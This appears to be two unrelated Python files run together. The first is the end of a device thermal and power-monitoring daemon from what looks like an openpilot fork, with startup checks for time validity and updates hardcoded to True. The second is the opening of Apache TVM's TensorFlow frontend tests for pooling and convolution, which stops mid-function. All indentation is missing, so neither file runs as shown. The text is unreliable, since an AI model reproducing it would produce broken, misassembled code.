cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
wifi_address=HARDWARE.get_ip_address(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
wifi_address='N/A',
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
restart_triggered_ts = 0.
panda_state_ts = 0.
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
# neokii
if sec_since_boot() - restart_triggered_ts < 5.:
onroad_conditions["not_restart_triggered"] = False
else:
onroad_conditions["not_restart_triggered"] = True
if params.get_bool("SoftRestartTriggered"):
params.put_bool("SoftRestartTriggered", False)
restart_triggered_ts = sec_since_boot()
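# recording the request time keeps onroad blocked for the next 5 s via not_restart_triggered above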
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
if pandaState.pandaType != log.PandaState.PandaType.unknown:
panda_state_ts = sec_since_boot()
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
# Set up the fan handler on the first connection to the panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
if TICI:
fan_controller = TiciFanController()
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.wifiIpAddress = last_hw_state.wifi_address
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
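# batteryCurrent appears to be reported in microamps; dividing by 1e6 filters the draw in amps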
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
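# i.e. the device is currently offroad and has either never been onroad since boot
# or has been offroad for at least 5 minutes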
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
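# the overlap between adjacent bands' min/max temperatures acts as hysteresis. With purely
# illustrative numbers (not the real THERMAL_BANDS values): if green topped out at 70C and
# yellow spanned 60-80C, a reading of 75C while yellow would neither promote nor demote the
# status, so it doesn't flap between bands on small temperature swings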
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = True #(now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = True #params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with only 2% of free space left we kill all processes, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
test_forward.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
TensorFlow testcases
====================
This article is a test script to test TensorFlow operators with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
except ImportError:
import tensorflow as tf
# Only allow TF to use half of the GPU RAM so the other half is left
# for TVM
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
sess.close()
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from tvm.relay.frontend.tensorflow import from_tensorflow
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
if not isinstance(x, list):
x = [x]
return x
tf_dtypes = {
"float32": tf.float32,
"float16": tf.float16,
"float64": tf.float64,
"int32": tf.int32,
"uint8": tf.uint8,
"int8": tf.int8,
"int16": tf.int16,
"uint16": tf.uint16,
"int64": tf.int64,
}
def vmobj_to_list(o):
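# Recursively flatten a TVM runtime object (NDArray, ADT, or Relay constructor value) into a flat Python list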
if isinstance(o, tvm.nd.NDArray):
return [o.numpy()]
elif isinstance(o, tvm.runtime.container.ADT):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
elif isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
if o.constructor.name_hint == "Cons":
tl = vmobj_to_list(o.fields[1])
hd = vmobj_to_list(o.fields[0])
hd.extend(tl)
return hd
elif o.constructor.name_hint == "Nil":
return []
elif "tensor_nil" in o.constructor.name_hint:
return [0]
elif "tensor" in o.constructor.name_hint:
return [o.fields[0].numpy()]
else:
raise RuntimeError("Unknown object type: %s" % o.constructor.name_hint)
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
graph_def,
input_data,
input_node,
num_output=1,
target="llvm",
out_names=None,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
layout=None,
disabled_pass=None,
ignore_in_shape=False,
serialize=False,
convert_config=None,
):
"""Generic function to compile on relay and execute on tvm"""
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
if target == "cuda":
layout = cuda_layout
target_host = None
if ignore_in_shape:
shape_dict = None
else:
shape_dict = {
e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
}
mod, params = relay.frontend.from_tensorflow(
graph_def,
layout=layout,
shape=shape_dict,
outputs=out_names,
convert_config=convert_config,
)
dev = tvm.device(target, 0)
if mode == "debug":
inputs = []
for param in mod["main"].params:
found = False
for i, n in enumerate(input_node):
if n == param.name_hint:
found = True
inputs.append(tvm.nd.array(input_data[i]))
break
# The interpreter doesn't bind constants, so we still need to look them up in params
if not found:
inputs.append(tvm.nd.array(params[param.name_hint]))
result = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm").evaluate()(
*inputs
)
return vmobj_to_list(result)
elif mode == "vm":
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
mod = relay.transform.InferType()(mod)
vm_exec = relay.vm.compile(mod, target="llvm", params=params)
if serialize:
code, lib = vm_exec.save()
vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
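# serialize=True round-trips the compiled Executable through save()/load_exec
# to also exercise VM executable serialization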
vm = VirtualMachine(vm_exec, tvm.cpu())
inputs = {}
for e, i in zip(input_node, input_data):
inputs[e] = tvm.nd.array(i)
result = vm.invoke("main", **inputs)
return vmobj_to_list(result)
else:
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
target = tvm.target.Target(target, target_host)
graph, lib, params = relay.build(mod, target=target, params=params)
from tvm.contrib import graph_executor
m = graph_executor.create(graph, lib, dev)
# set inputs
for e, i in zip(input_node, input_data):
if e != "":
m.set_input(e, tvm.nd.array(i))
m.set_input(**params)
# execute
m.run()
# get outputs
assert out_names is None or num_output == len(
out_names
), "out_names: {} num_output: {}".format(out_names, num_output)
tvm_output_list = [m.get_output(i).numpy() for i in range(num_output)]
return tvm_output_list
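# A minimal usage sketch (hypothetical names): given a frozen GraphDef `graph_def` with a single
# float32 placeholder "input" of shape (1, 224, 224, 3), something like
#   data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
#   outputs = run_tvm_graph(graph_def, data, "input", num_output=1, target="llvm")
# returns a list with one numpy array per requested output.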
def run_tf_graph(sess, input_data, input_node, output_node):
"""Generic function to execute tensorflow"""
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
output_node = convert_to_list(output_node)
tensor = [sess.graph.get_tensor_by_name(output_name) for output_name in output_node]
input_dict = {e: input_data[i] for i, e in enumerate(input_node)}
if len(input_node) == 1 and input_node[0] == "":
output_data = sess.run(tensor)
else:
output_data = sess.run(tensor, input_dict)
return output_data
def compare_tf_with_tvm(
in_data,
in_name,
out_name,
init_global_variables=False,
no_gpu=False,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
add_shapes_to_graph_def=True,
targets=None,
ignore_in_shape=False,
convert_config=None,
):
"""Generic function to generate and compare tensorflow and TVM output"""
def name_without_num(name):
return name.split(":")[0] if ":" in name else name
out_name = convert_to_list(out_name)
out_node = [name_without_num(name) for name in out_name]
in_data = convert_to_list(in_data)
in_name = convert_to_list(in_name)
in_node = [name_without_num(name) for name in in_name]
with tf.Session() as sess:
if init_global_variables:
sess.run(variables.global_variables_initializer())
final_graph_def = (
tf_testing.AddShapesToGraphDef(sess, out_node)
if add_shapes_to_graph_def
else tf.get_default_graph().as_graph_def()
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
devices = targets if targets else ["llvm", "cuda"]
for device in devices:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
if no_gpu and device == "cuda":
continue
if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
print("Skip because cublas is not enabled: %s" % device)
continue
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=device,
out_names=out_name,
num_output=len(out_name),
opt_level=opt_level,
mode=mode,
cuda_layout=cuda_layout,
ignore_in_shape=ignore_in_shape,
convert_config=convert_config,
)
# since the output names from the TensorFlow and Relay runs are not exactly the same,
# only the first len(tf_output) outputs are compared
for i in range(len(tf_output)):
if not isinstance(tf_output[i], np.ndarray):
assert len(tvm_output[i].shape) == 0
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
sess.close()
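# Typical usage (as in the tests below, with hypothetical tensor names): build the ops inside
# `with tf.Graph().as_default():` and, still inside that scope, call e.g.
#   compare_tf_with_tvm(np_input, "Placeholder:0", "Relu:0")
# which runs the graph through both TensorFlow and TVM and asserts the outputs match.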
def is_gpu_available():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpu_list = [x.name for x in local_device_protos if x.device_type == "GPU"]
if len(gpu_list) > 0:
print("Tensorflow GPU:", gpu_list)
return True
else:
return False
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
"""One iteration of pool operation with given shapes and attributes"""
x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
_test_pooling_iteration(input_shape, **kwargs)
if is_gpu_available():
if len(input_shape) == 4:
input_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
if isinstance(kwargs["padding"], list):
kwargs["padding"] = [kwargs["padding"][ii] for ii in (0, 3, 1, 2)]
kwargs["data_format"] = "NCHW"
_test_pooling_iteration(input_shape, **kwargs)
def _test_pooling_dynamic(input_shape, np_shape, **kwargs):
"""Pooling with dynamic height and width dimensions."""
x = -np.arange(np.prod(np_shape), dtype=np.float32).reshape(np_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, mode="vm", ignore_in_shape=True)
@tvm.testing.uses_gpu
def test_forward_pooling():
"""Pooling"""
# TensorFlow only supports NDHWC for max_pool3d on CPU
for pool_type in ["AVG", "MAX"]:
# NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling_dynamic(
input_shape=[1, None, None, 3],
np_shape=[1, 32, 32, 3],
window_shape=[2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
# test cases for max_pool3d & avg_pool3d with layout NCDHW
# TensorFlow pool3d doesn't support NCDHW on CPU
if is_gpu_available():
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
data_format="NCDHW",
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
data_format="NCDHW",
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[2, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[2, 3],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[2, 1],
)
# Tests involving SpaceToBatchND
_test_pooling(
input_shape=[1, 1, 2, 1],
window_shape=[1, 1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 2],
)
_test_pooling(
input_shape=[1, 2, 1],
window_shape=[1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[2],
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[4, 4],
padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
pooling_type="MAX",
dilation_rate=[1, 1],
strides=[1, 1],
)
#######################################################################
# Convolution
# -----------
def _test_convolution(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
"""One iteration of convolution with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initialize the input tensor with an array of incrementing
# numbers starting from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv2d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv2D:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
elif opname == "conv_transpose":
nn_ops.conv2d_transpose(
in_data,
in_filter,
output_shape=deconv_output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"conv2d_transpose:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
else:
nn_ops.depthwise_conv2d_native(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"DepthwiseConv2dNative:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@pytest.mark.skip(reason="See https://github.com/apache/tvm/issues/10275")
@tvm.testing.uses_gpu
def test_forward_convolution():
if is_gpu_available():
_test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution(
"depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 17, 17],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 16, 16],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 19, 8, 8],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NCHW",
[1, 1, 8, 8],
)
_test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"conv",
[4, 17, 17, 12],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
